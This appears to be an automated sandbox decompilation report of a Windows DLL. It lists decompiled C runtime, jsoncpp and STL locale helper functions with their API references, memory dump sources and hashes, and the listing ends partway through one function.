                                                    • Part of subcall function 10006F20: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10006F5A
                                                    • Part of subcall function 10138DD0: std::bad_exception::bad_exception.LIBCMTD ref: 10138DDD
                                                  • _abort.LIBCMT ref: 1013AD28
                                                    • Part of subcall function 10026CE8: __NMSG_WRITE.LIBCMT ref: 10026D0F
                                                    • Part of subcall function 10026CE8: _raise.LIBCMT ref: 10026D20
                                                    • Part of subcall function 10026CE8: _memset.LIBCMT ref: 10026DA3
                                                    • Part of subcall function 10026CE8: SetUnhandledExceptionFilter.KERNEL32 ref: 10026DC3
                                                    • Part of subcall function 10026CE8: UnhandledExceptionFilter.KERNEL32(?), ref: 10026DCD
                                                    • Part of subcall function 10005930: std::bad_exception::~bad_exception.LIBCMTD ref: 10005948
                                                  Strings
                                                  • in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 1013ACD1
                                                  • in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 1013AD5D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessorUnhandledVirtual$Concurrency::RootRoot::_abort_malloc_memset_raisestd::bad_exception::bad_exceptionstd::bad_exception::~bad_exception
                                                  • String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
                                                  • API String ID: 1629281245-1516562270
                                                  • Opcode ID: a9bed1177c470171533d599b1af42dbcf31e6c03a2ddb0e111d23f8eaa0c7eee
                                                  • Instruction ID: 95d649545cb7e8b79e197c63ef554a18887b215f0de5f871ca54305b17fe0a37
                                                  • Opcode Fuzzy Hash: a9bed1177c470171533d599b1af42dbcf31e6c03a2ddb0e111d23f8eaa0c7eee
                                                  • Instruction Fuzzy Hash: 5F3155B5C01219EBEB14DFA4DD46BEEB7B4EF04310F5082A8E51967281DB346B04CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E1000BBB0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				intOrPtr _v36;
                                                  				char _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _t59;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x10170888);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t59;
                                                  				E10022AB1( &_v28, 0);
                                                  				_v8 = 0;
                                                  				_v32 =  *0x10404ed8;
                                                  				_v24 = E10004A80(0x10401630);
                                                  				_t46 = _a4;
                                                  				_v20 = E10004C90(_a4, _v24);
                                                  				if(_v20 == 0) {
                                                  					if(_v32 == 0) {
                                                  						if(E10004F10(__ebx, _t46, __edi, __esi,  &_v32) != 0xffffffff) {
                                                  							_v20 = _v32;
                                                  							 *0x10404ed8 = _v32;
                                                  							_v36 = _v32;
                                                  							E10004AD0(_v36);
                                                  							E10004B70(_v36);
                                                  						} else {
                                                  							E100231FA( &_v48, "bad cast");
                                                  							E10028911( &_v48, 0x1027f3f8);
                                                  						}
                                                  					} else {
                                                  						_v20 = _v32;
                                                  					}
                                                  				}
                                                  				_v52 = _v20;
                                                  				_v8 = 0xffffffff;
                                                  				E10022AD2( &_v28);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v52;
                                                   			}

                                                   Instruction addresses (address column of the decompiled lines above, in listing order): 0x1000bbb3, 0x1000bbb5, 0x1000bbc0, 0x1000bbc1, 0x1000bbd0, 0x1000bbd5, 0x1000bbe1, 0x1000bbee, 0x1000bbf5, 0x1000bbfd, 0x1000bc04, 0x1000bc0c, 0x1000bc25, 0x1000bc47, 0x1000bc4d, 0x1000bc55, 0x1000bc5b, 0x1000bc63, 0x1000bc27, 0x1000bc2f, 0x1000bc3d, 0x1000bc3d, 0x1000bc0e, 0x1000bc11, 0x1000bc11, 0x1000bc0c, 0x1000bc6b, 0x1000bc6e, 0x1000bc78, 0x1000bc83, 0x1000bc8d

                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1000BBD0
                                                  • int.LIBCPMTD ref: 1000BBE9
                                                    • Part of subcall function 10004A80: std::_Lockit::_Lockit.LIBCPMT ref: 10004A96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_
                                                  • String ID: bad cast
                                                  • API String ID: 3382485803-3145022300
                                                  • Opcode ID: 3f7d5acb45878f3068c0b7c5e097225b4f9662cb05d50eb4fe93152d777a4b85
                                                  • Instruction ID: 4c2f27c851b9c4d37b77e5a1dee80e796b24b7cd594fb72cd0ee5d1fcd5963d9
                                                  • Opcode Fuzzy Hash: 3f7d5acb45878f3068c0b7c5e097225b4f9662cb05d50eb4fe93152d777a4b85
                                                  • Instruction Fuzzy Hash: FE212AB4D04609DBDB04DF94D881BEEB7B0FB48350F10862AE826733A4DB346A41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E1000BD90(void* __eflags, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				intOrPtr _v36;
                                                  				char _v48;
                                                  				intOrPtr _v52;
                                                  				void* _t42;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				intOrPtr _t59;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x10170888);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t59;
                                                  				E10022AB1( &_v28, 0);
                                                  				_v8 = 0;
                                                  				_v32 =  *0x10404edc;
                                                  				_v24 = E10004A80(0x10404f40);
                                                  				_t46 = _a4;
                                                  				_v20 = E10004C90(_a4, _v24);
                                                  				if(_v20 == 0) {
                                                  					if(_v32 == 0) {
                                                  						if(E1000C610(_t42, _t46, _t57, _t58,  &_v32) != 0xffffffff) {
                                                  							_v20 = _v32;
                                                  							 *0x10404edc = _v32;
                                                  							_v36 = _v32;
                                                  							E10004AD0(_v36);
                                                  							E10004B70(_v36);
                                                  						} else {
                                                  							E100231FA( &_v48, "bad cast");
                                                  							E10028911( &_v48, 0x1027f3f8);
                                                  						}
                                                  					} else {
                                                  						_v20 = _v32;
                                                  					}
                                                  				}
                                                  				_v52 = _v20;
                                                  				_v8 = 0xffffffff;
                                                  				E10022AD2( &_v28);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v52;
                                                   			}

                                                   Instruction addresses (address column of the decompiled lines above, in listing order): 0x1000bd93, 0x1000bd95, 0x1000bda0, 0x1000bda1, 0x1000bdb0, 0x1000bdb5, 0x1000bdc1, 0x1000bdce, 0x1000bdd5, 0x1000bddd, 0x1000bde4, 0x1000bdec, 0x1000be05, 0x1000be27, 0x1000be2d, 0x1000be35, 0x1000be3b, 0x1000be43, 0x1000be07, 0x1000be0f, 0x1000be1d, 0x1000be1d, 0x1000bdee, 0x1000bdf1, 0x1000bdf1, 0x1000bdec, 0x1000be4b, 0x1000be4e, 0x1000be58, 0x1000be63, 0x1000be6d

                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1000BDB0
                                                  • int.LIBCPMTD ref: 1000BDC9
                                                    • Part of subcall function 10004A80: std::_Lockit::_Lockit.LIBCPMT ref: 10004A96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_
                                                  • String ID: bad cast
                                                  • API String ID: 3382485803-3145022300
                                                  • Opcode ID: 40a023c32f73030297f394e2b544f57369c186710ba49cffefdbeccd1091c4a8
                                                  • Instruction ID: 17ab10c1bcb3da889ba3c0cd80381a32c4fedffd91ea7508abbad60a4b834770
                                                  • Opcode Fuzzy Hash: 40a023c32f73030297f394e2b544f57369c186710ba49cffefdbeccd1091c4a8
                                                  • Instruction Fuzzy Hash: 5B212AB5D0464ADBDB14DF94D881BEEF7B0FB48350F10862AE92677394DB346901CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E1003B1B2(void* __ebx, void* __edx, void* __edi, signed int _a4, long _a8, long _a12) {
                                                  				void* _t8;
                                                  				long _t10;
                                                  				signed char* _t14;
                                                  				signed int _t15;
                                                  				signed int _t17;
                                                  				signed int _t24;
                                                  				signed int _t26;
                                                  
                                                  				_t26 = _a4;
                                                  				_t8 = E10038EBD(__ebx, __edx, __edi, _t26);
                                                  				_t29 = _t8 - 0xffffffff;
                                                  				if(_t8 != 0xffffffff) {
                                                  					_push(__edi);
                                                  					_t24 = SetFilePointer(_t8, _a8, 0, _a12);
                                                  					__eflags = _t24 - 0xffffffff;
                                                  					if(_t24 != 0xffffffff) {
                                                  						_t10 = 0;
                                                  						__eflags = 0;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  					}
                                                  					__eflags = _t10;
                                                  					if(_t10 == 0) {
                                                  						_t14 =  *((intOrPtr*)(0x10404f60 + (_t26 >> 5) * 4)) + 4 + (_t26 & 0x0000001f) * 0x28;
                                                  						 *_t14 =  *_t14 & 0x000000fd;
                                                  						__eflags =  *_t14;
                                                  						_t15 = _t24;
                                                  					} else {
                                                  						_t15 = E10028E0F(_t10) | 0xffffffff;
                                                  					}
                                                  					return _t15;
                                                  				} else {
                                                  					_t17 = L10028DE9(_t29);
                                                  					 *_t17 = 9;
                                                  					return _t17 | 0xffffffff;
                                                  				}
                                                   			}

                                                   Instruction addresses (address column of the decompiled lines above, in listing order): 0x1003b1b3, 0x1003b1b8, 0x1003b1bd, 0x1003b1c1, 0x1003b1d3, 0x1003b1e5, 0x1003b1e7, 0x1003b1ea, 0x1003b1f4, 0x1003b1f4, 0x1003b1ec, 0x1003b1ec, 0x1003b1ec, 0x1003b1f6, 0x1003b1f8, 0x1003b218, 0x1003b21c, 0x1003b21c, 0x1003b21f, 0x1003b1fa, 0x1003b201, 0x1003b201, 0x1003b223, 0x1003b1c3, 0x1003b1c3, 0x1003b1c8, 0x1003b1d2, 0x1003b1d2

                                                  APIs
                                                  • SetFilePointer.KERNEL32(00000000,00004000,00000000,00000109,00004000,00000109,1003868A,00000109,00000000,00000000), ref: 1003B1DF
                                                  • GetLastError.KERNEL32 ref: 1003B1EC
                                                  • __dosmaperr.LIBCMT ref: 1003B1FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                  • String ID: F*
                                                  • API String ID: 2336955059-2578036169
                                                  • Opcode ID: da889b9dd5488f43820324f9f96d729f59ef45e8aeba667e93be562567374419
                                                  • Instruction ID: 335f239801935c567e6228d49d0f3f6214c165517ed924247a08d004b9cb1564
                                                  • Opcode Fuzzy Hash: da889b9dd5488f43820324f9f96d729f59ef45e8aeba667e93be562567374419
                                                  • Instruction Fuzzy Hash: CCF02836619A225EC612CB7CBC4494B3B54DB81336F220B41F630DF1E1CF30D8808761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E1013D610(intOrPtr _a4, unsigned int _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v16;
                                                  				char _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _t116;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x1016b930);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t116;
                                                  				_v48 = 0;
                                                  				E10002370( &_v44);
                                                  				_v8 = 0;
                                                  				if(_a8 > 0x7f) {
                                                  					if(_a8 > 0x7ff) {
                                                  						if(_a8 > 0xffff) {
                                                  							if(_a8 <= 0x10ffff) {
                                                  								E10005A30( &_v44, 4);
                                                  								 *((char*)(E10012DC0( &_v44, 3))) = _a8 & 0x0000003f | 0x00000080;
                                                  								 *((char*)(E10012DC0( &_v44, 2))) = _a8 >> 0x00000006 & 0x0000003f | 0x00000080;
                                                  								 *((char*)(E10012DC0( &_v44, 1))) = _a8 >> 0x0000000c & 0x0000003f | 0x00000080;
                                                  								 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x00000012 & 0x00000007 | 0x000000f0;
                                                  							}
                                                  						} else {
                                                  							E10005A30( &_v44, 3);
                                                  							 *((char*)(E10012DC0( &_v44, 2))) = _a8 & 0x0000003f | 0x00000080;
                                                  							 *((char*)(E10012DC0( &_v44, 1))) = _a8 >> 0x00000006 & 0x0000003f | 0x00000080;
                                                  							 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x0000000c & 0x0000000f | 0x000000e0;
                                                  						}
                                                  					} else {
                                                  						E10005A30( &_v44, 2);
                                                  						 *((char*)(E10012DC0( &_v44, 1))) = _a8 & 0x0000003f | 0x00000080;
                                                  						 *((char*)(E10012DC0( &_v44, 0))) = _a8 >> 0x00000006 & 0x0000001f | 0x000000c0;
                                                  					}
                                                  				} else {
                                                  					E10005A30( &_v44, 1);
                                                  					 *((char*)(E10012DC0( &_v44, 0))) = _a8;
                                                  				}
                                                  				E100012D0(_a4,  &_v44);
                                                  				_v48 = _v48 | 0x00000001;
                                                  				_v8 = 0xffffffff;
                                                  				E10001360( &_v44);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _a4;
                                                   			}

                                                   Instruction addresses (address column of the decompiled lines above, in listing order): 0x1013d613, 0x1013d615, 0x1013d620, 0x1013d621, 0x1013d62c, 0x1013d636, 0x1013d63b, 0x1013d646, 0x1013d66d, 0x1013d6b8, 0x1013d71b, 0x1013d722, 0x1013d73d, 0x1013d758, 0x1013d773, 0x1013d78e, 0x1013d78e, 0x1013d6ba, 0x1013d6bf, 0x1013d6da, 0x1013d6f5, 0x1013d710, 0x1013d710, 0x1013d66f, 0x1013d674, 0x1013d68f, 0x1013d6aa, 0x1013d6aa, 0x1013d648, 0x1013d64d, 0x1013d65f, 0x1013d65f, 0x1013d797, 0x1013d7a2, 0x1013d7a5, 0x1013d7af, 0x1013d7ba, 0x1013d7c5

                                                  APIs
                                                  • std::ios_base::clear.LIBCPMTD ref: 1013D64D
                                                  • std::ios_base::clear.LIBCPMTD ref: 1013D674
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::ios_base::clear
                                                  • String ID:
                                                  • API String ID: 1443086396-0
                                                  • Opcode ID: 04c85ef5fb611d59148f4c15f4e540b41200cacbb628f7fd503e7141f05fc289
                                                  • Instruction ID: 7a008beed75abc9e9d01a78b6b7909d014ec60387612d3f5647e38b94e2695c0
                                                  • Opcode Fuzzy Hash: 04c85ef5fb611d59148f4c15f4e540b41200cacbb628f7fd503e7141f05fc289
                                                  • Instruction Fuzzy Hash: AB41AD76980348AEDB00DFA4D8D2BCC7B30FF19360F448118E6156F1D2DA746A59CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E10009CA0(intOrPtr __ecx, intOrPtr _a4, char _a8, char _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				char _v24;
                                                  				char _v36;
                                                  				char _v60;
                                                  				char _v84;
                                                  				char _v96;
                                                  				intOrPtr _v100;
                                                  				intOrPtr _t73;
                                                  				void* _t85;
                                                  
                                                  				_v100 = __ecx;
                                                  				_v12 = E1000B850( &_a8, E10009A40(_v100,  &_v24));
                                                  				_v8 = E1000B850( &_a20,  &_a8);
                                                  				if(_v12 >= E1000B850(E100097E0(_v100,  &_v36),  &_a20)) {
                                                  					E1000B240(_t85 - 0xc,  &_a8);
                                                  					E100097E0(_v100, _t85);
                                                  					E1000B240(_t85 - 0xfffffffffffffff4,  &_a20);
                                                  					_push( &_v84);
                                                  					E1000C430(_t85 - 0xfffffffffffffff4);
                                                  					while(1) {
                                                  						__eflags = _v8;
                                                  						if(__eflags <= 0) {
                                                  							goto L10;
                                                  						}
                                                  						E10009C00(_v100, __eflags);
                                                  						_t73 = _v8 - 1;
                                                  						__eflags = _t73;
                                                  						_v8 = _t73;
                                                  					}
                                                  				} else {
                                                  					E1000B240(_t85 - 0xc,  &_a20);
                                                  					E1000B240(_t85,  &_a8);
                                                  					E10009A40(_v100, _t85 - 0xfffffffffffffff4);
                                                  					_push( &_v60);
                                                  					E1000C3A0( &_v60);
                                                  					while(1) {
                                                  						_t95 = _v8;
                                                  						if(_v8 <= 0) {
                                                  							break;
                                                  						}
                                                  						E1000B5E0(_v100, _t95);
                                                  						_v8 = _v8 - 1;
                                                  					}
                                                  				}
                                                  				L10:
                                                  				E1000B000(E10009A40(_v100,  &_v96), _a4, _v12);
                                                  				return _a4;
                                                  			}

                                                  APIs
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009CF5
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D03
                                                    • Part of subcall function 1000C3A0: _DebugHeapAllocator.LIBCPMTD ref: 1000C3F0
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D46
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009D60
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocatorDebugHeap
                                                  • String ID:
                                                  • API String ID: 571936431-0
                                                  • Opcode ID: 808258f1aec5f36948ed59490177cca55885b9ed5bff084e0c21b3122da888ee
                                                  • Instruction ID: a9ddb65e9f4f371582b09de845b72be8d8c8d756e5c090e98bc0323d6fbb63ea
                                                  • Opcode Fuzzy Hash: 808258f1aec5f36948ed59490177cca55885b9ed5bff084e0c21b3122da888ee
                                                  • Instruction Fuzzy Hash: 34314276D1020CEBDF04EFF4D8969DE7779EF84380F00812AE9065B249EA30AB44DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E1000FAF0(intOrPtr __ecx, void* __eflags) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				intOrPtr _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _t67;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x1016b3b0);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t67;
                                                  				_push(__ecx);
                                                  				_v20 = _t67 - 0x18;
                                                  				_v44 = __ecx;
                                                  				_v28 = E100151D0(_v44 + 1, 1);
                                                  				_v24 = 0;
                                                  				_v8 = 0;
                                                  				_v32 = 0;
                                                  				E10009A20(_v44 + 2, E1000E8E0(_v28),  &_v32);
                                                  				_v24 = _v24 + 1;
                                                  				_v36 = 0;
                                                  				E10009A20(_v44 + 2, E1000E8F0(_v28),  &_v36);
                                                  				_v24 = _v24 + 1;
                                                  				_v40 = 0;
                                                  				E10009A20(_v44 + 2, E1000E900(_v28),  &_v40);
                                                  				_v8 = 0xffffffff;
                                                  				 *((char*)(E1000E8A0(_v28))) = 1;
                                                  				 *((char*)(E1000E8B0(_v28))) = 0;
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v28;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: allocator
                                                  • String ID:
                                                  • API String ID: 3447690668-0
                                                  • Opcode ID: 1e8ac10e548ac01737e0f35c9500240bf45ce1a8c7932cebd555f0e25cd544df
                                                  • Instruction ID: 886d3358d4855c180e59ee70d8d91a6cb6a60920bb8827e1400dbe0cecd4af85
                                                  • Opcode Fuzzy Hash: 1e8ac10e548ac01737e0f35c9500240bf45ce1a8c7932cebd555f0e25cd544df
                                                  • Instruction Fuzzy Hash: D2310AB5D002499FEB04CF98D842BEFBBB8EF48358F144519E605B7386DB756940CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10145FC0(void* __ebx, void* __edi, void* __esi, short* _a4) {
                                                  				char* _v8;
                                                  				int _v12;
                                                  				int _v16;
                                                  
                                                  				_v12 = E1002575D(_a4);
                                                  				_v16 = WideCharToMultiByte(0, 0, _a4, _v12, 0, 0, 0, 0);
                                                  				_t8 = _v12 + 1; // 0x1014b308
                                                  				_v8 = E100253AE(__ebx, _a4, __edi, __esi, _v12 + _t8);
                                                  				_t12 = _v12 + 1; // 0x1014b308
                                                  				E10025A10(__edi, _v8, 0, _v12 + _t12);
                                                  				WideCharToMultiByte(0, 0, _a4, _v12, _v8, _v16, 0, 0);
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,1014B307,1014B307,00000000,00000000,00000000,00000000,?,?,1014B307,00000000), ref: 10145FE9
                                                  • _malloc.LIBCMT ref: 10145FFA
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • _memset.LIBCMT ref: 10146013
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,1014B307,1014B307,00000000,?,00000000,00000000,?,?,?,?,?,?,1014B307,00000000), ref: 10146033
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocHeap_malloc_memset
                                                  • String ID:
                                                  • API String ID: 2311837860-0
                                                  • Opcode ID: dd14aa24a6eec4401e0223a67d6faaf52b1e424ca2f6068e25d00c98b4daff88
                                                  • Instruction ID: 660105b14d497b6cb9a24f2cb11c7d51371ee9754b2a7d7652d5b22537a5de45
                                                  • Opcode Fuzzy Hash: dd14aa24a6eec4401e0223a67d6faaf52b1e424ca2f6068e25d00c98b4daff88
                                                  • Instruction Fuzzy Hash: 9A1104B9A44208BFEB10DFD4DC82F9EB7B9EB48700F108154F609AB2C1D671BA448B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E1002CBBF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int _t15;
                                                  				LONG* _t21;
                                                  				long _t23;
                                                  				void* _t31;
                                                  				LONG* _t33;
                                                  				void* _t34;
                                                  				void* _t35;
                                                  
                                                  				_t35 = __eflags;
                                                  				_t29 = __edx;
                                                  				_t25 = __ebx;
                                                  				_push(0xc);
                                                  				_push(0x1027d5b0);
                                                  				E1002EB4C(__ebx, __edi, __esi);
                                                  				_t31 = E1002B8B7(__edx, __edi, _t35);
                                                  				_t15 =  *0x10289c08; // 0xfffffffe
                                                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                  					E1002E01C(0xd);
                                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                  					_t33 =  *(_t31 + 0x68);
                                                  					 *(_t34 - 0x1c) = _t33;
                                                  					__eflags = _t33 -  *0x10289b10; // 0x4671300
                                                  					if(__eflags != 0) {
                                                  						__eflags = _t33;
                                                  						if(_t33 != 0) {
                                                  							_t23 = InterlockedDecrement(_t33);
                                                  							__eflags = _t23;
                                                  							if(_t23 == 0) {
                                                  								__eflags = _t33 - 0x102896e8;
                                                  								if(__eflags != 0) {
                                                  									_push(_t33);
                                                  									E100252D1(_t25, _t31, _t33, __eflags);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t21 =  *0x10289b10; // 0x4671300
                                                  						 *(_t31 + 0x68) = _t21;
                                                  						_t33 =  *0x10289b10; // 0x4671300
                                                  						 *(_t34 - 0x1c) = _t33;
                                                  						InterlockedIncrement(_t33);
                                                  					}
                                                  					 *(_t34 - 4) = 0xfffffffe;
                                                  					E1002CC5A();
                                                  				} else {
                                                  					_t33 =  *(_t31 + 0x68);
                                                  				}
                                                  				if(_t33 == 0) {
                                                  					E1002ED46(_t25, _t29, _t31, 0x20);
